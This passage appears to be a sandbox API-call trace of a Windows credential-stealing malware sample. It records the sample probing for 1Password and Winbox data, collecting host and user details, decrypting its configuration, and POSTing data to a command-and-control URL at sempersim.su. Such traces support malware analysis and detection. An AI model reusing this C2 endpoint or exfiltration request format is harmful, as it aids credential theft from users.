out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 41 [0316.610] GetProcessHeap () returned 0x780000 [0316.610] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x56) returned 0x79a760 [0316.610] GetProcessHeap () returned 0x780000 [0316.610] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.611] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 0 [0316.611] GetProcessHeap () returned 0x780000 [0316.611] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.611] GetProcessHeap () returned 0x780000 [0316.611] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.611] GetProcessHeap () returned 0x780000 [0316.611] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.612] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.613] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0316.613] GetProcessHeap () returned 0x780000 [0316.613] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x79ca28 [0316.613] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.614] wvsprintfW (in: param_1=0x79ca28, param_2="Mikrotik\\Winbox", arglist=0x19fb5c | out: param_1="Mikrotik\\Winbox") returned 15 [0316.614] GetProcessHeap () returned 0x780000 [0316.614] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x22) returned 0x798960 [0316.614] GetProcessHeap () returned 0x780000 [0316.614] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.615] PathFileExistsW (pszPath="Mikrotik\\Winbox") returned 0 [0316.615] GetProcessHeap () returned 0x780000 [0316.616] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.616] GetProcessHeap () returned 0x780000 [0316.616] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798960 | out: hHeap=0x780000) returned 1 [0316.616] GetProcessHeap () returned 0x780000 [0316.616] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.617] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.617] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0316.617] GetProcessHeap () returned 0x780000 [0316.617] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.617] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.618] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19f994 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0316.618] GetProcessHeap () returned 0x780000 [0316.618] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x79a760 [0316.618] GetProcessHeap () returned 0x780000 [0316.618] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.619] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0xffffffff [0316.619] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9"), lpSecurityAttributes=0x0) returned 1 [0316.622] GetProcessHeap () returned 0x780000 [0316.622] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f50) returned 0x79ca28 [0316.623] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.623] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s.%s", arglist=0x19f9a8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0316.623] GetProcessHeap () returned 0x780000 [0316.623] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x72) returned 0x797c10 [0316.623] GetProcessHeap () returned 0x780000 [0316.624] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.624] GetProcessHeap () returned 0x780000 [0316.624] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.624] GetProcessHeap () returned 0x780000 [0316.624] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.624] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0316.625] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x1f0000 [0316.625] GetProcessHeap () returned 0x780000 [0316.626] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797c10 | out: hHeap=0x780000) returned 1 [0316.626] GetProcessHeap () returned 0x780000 [0316.626] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x1388) returned 0x79b520 [0316.626] GetProcessHeap () returned 0x780000 [0316.626] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0316.626] GetProcessHeap () returned 0x780000 [0316.626] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x11c) returned 0x79a2e8 [0316.627] RtlGetVersion (in: lpVersionInformation=0x79a2e8 | out: lpVersionInformation=0x79a2e8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0316.627] GetProcessHeap () returned 0x780000 [0316.627] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.627] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb18 | out: lpSystemTimeAsFileTime=0x19fb18*(dwLowDateTime=0xab8fb9b, dwHighDateTime=0x1d85fcb)) [0316.627] GetProcessHeap () returned 0x780000 [0316.627] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7) returned 0x79b350 [0316.627] GetProcessHeap () returned 0x780000 [0316.627] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x1a5) returned 0x79a550 [0316.627] GetProcessHeap () returned 0x780000 [0316.627] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa0000) returned 0x22e8020 [0316.659] GetProcessHeap () returned 0x780000 [0316.664] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x22e8020 | out: hHeap=0x780000) returned 1 [0316.668] GetProcessHeap () returned 0x780000 [0316.668] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79ca28 [0316.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.669] GetUserNameW (in: lpBuffer=0x79ca28, pcbBuffer=0x19fb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb74) returned 1 [0316.672] GetProcessHeap () returned 0x780000 [0316.673] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.673] GetProcessHeap () returned 0x780000 [0316.673] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79ca28 [0316.673] GetComputerNameW (in: lpBuffer=0x79ca28, nSize=0x19fb74 | out: lpBuffer="XC64ZB", nSize=0x19fb74) returned 1 [0316.673] GetProcessHeap () returned 0x780000 [0316.674] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.674] GetCurrentThread () returned 0xfffffffe [0316.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.677] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x0) returned 0 [0316.677] GetLastError () returned 0x3f0 [0316.677] GetCurrentProcess () returned 0xffffffff [0316.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.681] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x210) returned 1 [0316.681] GetProcessHeap () returned 0x780000 [0316.681] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79ca28 [0316.681] GetProcessHeap () returned 0x780000 [0316.681] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79d108 [0316.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.683] GetTokenInformation (in: TokenHandle=0x210, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fb70 | out: TokenInformation=0x0, ReturnLength=0x19fb70) returned 0 [0316.683] GetProcessHeap () returned 0x780000 [0316.683] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x24) returned 0x798960 [0316.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.685] GetTokenInformation (in: TokenHandle=0x210, TokenInformationClass=0x1, TokenInformation=0x798960, TokenInformationLength=0x24, ReturnLength=0x19fb70 | out: TokenInformation=0x798960, ReturnLength=0x19fb70) returned 1 [0316.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.688] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x798968*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x79ca28, cchName=0x19fb60, ReferencedDomainName=0x79d108, cchReferencedDomainName=0x19fb64, peUse=0x19fb5c | out: Name="RDhJ0CNFevzX", cchName=0x19fb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fb64, peUse=0x19fb5c) returned 1 [0316.694] GetProcessHeap () returned 0x780000 [0316.694] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f44) returned 0x79e828 [0316.696] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.697] wvsprintfW (in: param_1=0x79e828, param_2="%s", arglist=0x19fb4c | out: param_1="XC64ZB") returned 6 [0316.697] GetProcessHeap () returned 0x780000 [0316.697] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x10) returned 0x78b700 [0316.697] GetProcessHeap () returned 0x780000 [0316.698] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79e828 | out: hHeap=0x780000) returned 1 [0316.698] GetProcessHeap () returned 0x780000 [0316.699] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798960 | out: hHeap=0x780000) returned 1 [0316.699] CloseHandle (hObject=0x210) returned 1 [0316.699] GetProcessHeap () returned 0x780000 [0316.700] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d108 | out: hHeap=0x780000) returned 1 [0316.700] GetProcessHeap () returned 0x780000 [0316.700] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.700] GetProcessHeap () returned 0x780000 [0316.700] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b700 | out: hHeap=0x780000) returned 1 [0316.701] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.702] GetDesktopWindow () returned 0x10010 [0316.703] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.704] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fb68 | out: lpRect=0x19fb68) returned 1 [0316.705] GetProcessHeap () returned 0x780000 [0316.705] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8) returned 0x79b360 [0316.705] GetProcessHeap () returned 0x780000 [0316.705] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b360 | out: hHeap=0x780000) returned 1 [0316.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0316.708] GetUserNameW (in: lpBuffer=0x19f968, pcbBuffer=0x19fb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb70) returned 1 [0316.710] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x74d00000 [0316.714] GetProcAddress (hModule=0x74d00000, lpProcName="NetUserGetInfo") returned 0x744833a0 [0316.838] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fb74 | out: bufptr=0x794168*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xad905, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0317.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.016] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb60, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fb68 | out: pSid=0x19fb68*=0x78b778*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0317.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.017] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x78b778*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fb6c | out: IsMember=0x19fb6c) returned 1 [0317.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.019] GetNativeSystemInfo (in: lpSystemInfo=0x19fb44 | out: lpSystemInfo=0x19fb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0317.019] GetProcessHeap () returned 0x780000 [0317.019] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x40) returned 0x7944c8 [0317.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.024] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 0 [0317.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.040] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x79a2e8) returned 1 [0317.052] GetProcessHeap () returned 0x780000 [0317.052] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x24) returned 0x7989f0 [0317.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.053] CryptImportKey (in: hProv=0x79a2e8, pbData=0x7989f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x78d288) returned 1 [0317.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.055] CryptSetKeyParam (hKey=0x78d288, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0317.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.056] CryptSetKeyParam (hKey=0x78d288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.056] GetProcessHeap () returned 0x780000 [0317.056] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7989f0 | out: hHeap=0x780000) returned 1 [0317.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.058] CryptDecrypt (in: hKey=0x78d288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7944c8, pdwDataLen=0x19f974 | out: pbData=0x7944c8, pdwDataLen=0x19f974) returned 1 [0317.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.063] CryptDestroyKey (hKey=0x78d288) returned 1 [0317.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0317.063] CryptReleaseContext (hProv=0x79a2e8, dwFlags=0x0) returned 1 [0317.063] GetProcessHeap () returned 0x780000 [0317.063] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x212) returned 0x79d290 [0317.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.064] StrStrA (lpFirst="http://sempersim.su/gf3/fre.php", lpSrch="http://") returned="http://sempersim.su/gf3/fre.php" [0317.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.065] StrStrA (lpFirst="sempersim.su/gf3/fre.php", lpSrch="/") returned="/gf3/fre.php" [0317.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.066] StrStrA (lpFirst="sempersim.su/gf3/fre.php", lpSrch=":") returned 0x0 [0317.066] GetProcessHeap () returned 0x780000 [0317.066] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x20) returned 0x793260 [0317.066] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x7930d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x79e888*(sa_family=2, sin_port=0x50, sin_addr="88.218.168.92"), ai_next=0x0)) returned 0 [0318.648] GetProcessHeap () returned 0x780000 [0318.648] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b340 [0318.648] socket (af=2, type=1, protocol=6) returned 0x264 [0318.649] connect (s=0x264, name=0x79e888*(sa_family=2, sin_port=0x50, sin_addr="88.218.168.92"), namelen=16) returned 0 [0318.716] FreeAddrInfoW (pAddrInfo=0x7930d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x79e888*(sa_family=2, sin_port=0x50, sin_addr="88.218.168.92"), ai_next=0x0)) [0318.716] GetProcessHeap () returned 0x780000 [0318.716] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7d) returned 0x79cab8 [0318.716] GetProcessHeap () returned 0x780000 [0318.716] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x201b) returned 0x7a3bc8 [0318.717] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0318.718] wvsprintfA (in: param_1=0x7a3bc8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f958 | out: param_1="POST /gf3/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0318.718] GetProcessHeap () returned 0x780000 [0318.718] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xad) returned 0x7a2720 [0318.718] GetProcessHeap () returned 0x780000 [0318.719] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0318.719] GetProcessHeap () returned 0x780000 [0318.719] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e) returned 0x7a2f08 [0318.719] GetProcessHeap () returned 0x780000 [0318.719] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x1fdc) returned 0x7a3bc8 [0318.720] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0318.721] wvsprintfA (in: param_1=0x7a3bc8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f958 | out: param_1="POST /gf3/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 1234DF8C\r\nContent-Length: 288\r\nConnection: close\r\n\r\n") returned 236 [0318.721] GetProcessHeap () returned 0x780000 [0318.721] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xee) returned 0x7a5bb0 [0318.721] GetProcessHeap () returned 0x780000 [0318.721] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0318.721] send (s=0x264, buf=0x7a5bb0*, len=236, flags=0) returned 236 [0318.722] send (s=0x264, buf=0x79b520*, len=288, flags=0) returned 288 [0318.722] GetProcessHeap () returned 0x780000 [0318.722] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xfd0) returned 0x7a3bc8 [0318.722] recv (in: s=0x264, buf=0x7a3bc8, len=4048, flags=0 | out: buf=0x7a3bc8*) returned 229 [0319.185] GetProcessHeap () returned 0x780000 [0319.185] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a5bb0 | out: hHeap=0x780000) returned 1 [0319.185] GetProcessHeap () returned 0x780000 [0319.185] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2f08 | out: hHeap=0x780000) returned 1 [0319.185] GetProcessHeap () returned 0x780000 [0319.186] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2720 | out: hHeap=0x780000) returned 1 [0319.186] GetProcessHeap () returned 0x780000 [0319.186] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79cab8 | out: hHeap=0x780000) returned 1 [0319.186] closesocket (s=0x264) returned 0 [0319.187] GetProcessHeap () returned 0x780000 [0319.187] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b340 | out: hHeap=0x780000) returned 1 [0319.187] GetProcessHeap () returned 0x780000 [0319.187] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d290 | out: hHeap=0x780000) returned 1 [0319.187] GetProcessHeap () returned 0x780000 [0319.187] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7944c8 | out: hHeap=0x780000) returned 1 [0319.187] GetProcessHeap () returned 0x780000 [0319.188] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x793260 | out: hHeap=0x780000) returned 1 [0319.188] GetProcessHeap () returned 0x780000 [0319.188] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79d290 [0319.188] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0319.189] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79d290 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0319.189] GetProcessHeap () returned 0x780000 [0319.189] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x7a4ba0 [0319.191] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.191] wvsprintfW (in: param_1=0x7a4ba0, param_2="%s\\%s", arglist=0x19f988 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0319.191] GetProcessHeap () returned 0x780000 [0319.192] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x79d780 [0319.192] GetProcessHeap () returned 0x780000 [0319.192] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a4ba0 | out: hHeap=0x780000) returned 1 [0319.193] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0319.193] GetProcessHeap () returned 0x780000 [0319.193] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f50) returned 0x7a4ba0 [0319.193] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.194] wvsprintfW (in: param_1=0x7a4ba0, param_2="%s\\%s.%s", arglist=0x19f99c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0319.194] GetProcessHeap () returned 0x780000 [0319.194] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x72) returned 0x797910 [0319.194] GetProcessHeap () returned 0x780000 [0319.195] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a4ba0 | out: hHeap=0x780000) returned 1 [0319.195] GetProcessHeap () returned 0x780000 [0319.195] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d780 | out: hHeap=0x780000) returned 1 [0319.195] GetProcessHeap () returned 0x780000 [0319.195] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d290 | out: hHeap=0x780000) returned 1 [0319.197] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x19fb34, dwLength=0x1c | out: lpBuffer=0x19fb34*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0319.198] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x19fb14, dwLength=0x1c | out: lpBuffer=0x19fb14*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0319.200] VirtualAlloc (lpAddress=0x0, dwSize=0x1004, flAllocationType=0x3000, flProtect=0x4) returned 0x5b0000 [0319.202] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.203] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb")) returned 0 [0319.203] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0319.205] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0319.206] WriteFile (in: hFile=0x264, lpBuffer=0x5b0000*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x19fb3c, lpOverlapped=0x0 | out: lpBuffer=0x5b0000*, lpNumberOfBytesWritten=0x19fb3c*=0x4, lpOverlapped=0x0) returned 1 [0319.208] CloseHandle (hObject=0x264) returned 1 [0319.212] GetProcessHeap () returned 0x780000 [0319.212] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797910 | out: hHeap=0x780000) returned 1 [0319.212] GetProcessHeap () returned 0x780000 [0319.212] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0319.213] GetProcessHeap () returned 0x780000 [0319.213] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0319.213] GetProcessHeap () returned 0x780000 [0319.214] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0319.214] GetProcessHeap () 